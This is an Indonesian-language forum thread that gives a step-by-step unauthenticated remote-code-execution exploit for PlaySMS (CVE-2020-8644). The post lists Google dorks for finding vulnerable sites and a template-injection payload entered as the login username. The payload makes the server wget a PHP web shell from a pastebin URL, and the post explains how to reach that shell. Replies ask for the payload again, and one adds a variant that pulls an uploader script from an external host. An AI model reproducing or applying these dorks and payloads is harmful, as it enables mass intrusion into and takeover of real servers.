PlaySMS Unauthenticated RCE

Google Dork :

  • inurl:?app=main intitle:sms
  • inurl:?app=main intext:“recover password”
    #Payload RCE :
  • {{wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php}}

Langkah-Langkah Exploitasi

  1. kalian dorking dulu

  2. jika sudah menemukan target maka akan muncul tempat login

  3. pada bagian username, masukkan payload rce :
    {{wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php}}
    Note : linuxploit.php bisa kalian ubah dengan nama sesuka kalian

  4. masukkan payload RCE pada username

  5. selanjutnya akses shell : http://target.com/linxploit.php

© PlaySMS Unauthenticated RCE Upload Shell
Referensi : https://sec.linuxploit.com/2020/04/playsms-unauthenticated-rce-upload-shell.html

1 Like

Wah, ngeri om…
Btw Pastebinnya dihapus om…
Ini yg CVE-2020-8644 bukan?
Klo iya upload lagi dong payload phpnya.

Ini dulu gue pernah mau coba pake PlaySMS nih. :matabelo:

iya CVE 2020-8644

share payloadnya lagi dong mas, pastebinnya 404

Izin coba om

payload bisa buat sndiri gan tinggal taruh script uploader aja di webhosting nya atau di pastebin, tapi saya saranin di hosting sndiri, krena klo di pastebin suka ke delete

{{ wget https://linksitus/up.txt -O shell.php }}

siap gan :smiley: